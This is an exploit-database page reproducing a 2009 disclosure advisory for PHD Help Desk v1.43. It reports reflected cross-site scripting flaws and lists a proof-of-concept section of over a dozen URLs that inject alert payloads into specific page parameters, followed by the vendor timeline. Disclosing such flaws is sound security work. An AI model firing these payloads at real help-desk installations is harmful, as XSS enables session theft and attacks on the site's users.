[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHD Help Desk v1.43 Mutliple XSS

Author
Amol Naik
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9984
Category
web applications
Date add
16-11-2009
Platform
unsorted
================================
PHD Help Desk v1.43 Mutliple XSS
================================

################################################################################
Mutliple XSS in PHD Help Desk v1.43
 
Name Multiple vulnerabilities in PHD Help Dsk
Systems Affected PHD Help Desk v1.43 and possibly earlier versions
Site http://www.p-hd.com.ar/
################################################################################
 
 
############
1. OVERVIEW
############
 
PHD Help Desk is the software conceived for the registry and follow up of incidents in the Help Desk or Service Desk in your IT area of their company or organization.
 
###############
2. DESCRIPTION
###############
 
PHD Help Desk is vulnerable to Multiple cross-site scripting instances.
 
######################
3. TECHNICAL DETAILS
######################
 
Multiple Cross-site Scripting
++++++++++++++++++++++++++++++
 
Multiple pages found vulnerable to Cross-site Scripting mainly due to improper use of $_SERVER['PHP_SELF'] and lack of sanitization in user inputs.
 
++++
POC
++++
 
http://server/phd/area.php/'>alert("XSS")
http://server/phd/area.php?pagina='>alert("XSS")
http://server/phd/area.php?sentido='>alert("XSS")
http://server/phd/area.php?q_registros='>alert("XSS")
http://server/phd/area.php?orden='>alert("XSS")
http://server/phd/solic_display.php?pagina=1&q_registros=>alert("XSS")&orden=seq_solicitud_id
http://server/phd/area_list.php/'>alert("XSS")
http://server/phd/area_list.php?orden=nombre&sentido=&pagina=1&q_registros=0'>alert("XSS")
http://server/phd/atributo.php/'>alert("XSS")
http://server/phd/atributo_list.php?pagina=1'>alert("XSS")&q_registros=15&orden=activo&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15'>alert("XSS")&orden=activo&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo'>alert("XSS")&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido='>alert("XSS")
http://server/phd/caso_insert.php/'>alert("XSS")
 
 
Other pages may be vulnerable as well.
 
 
############
4. TimeLine
############
 
05/11/2009 Bug Discovered
05/11/2009 Reported to Vendor
05/11/2009 Vendor agrees to fix this in 2.00 version
 
Response from Vendor:
"I forgot to protect the $_GET entries, we are working in the 2.00 version and we will add this sugestion."
 
16/11/2009 Public Disclosure 



#  0day.today [2024-12-25]  #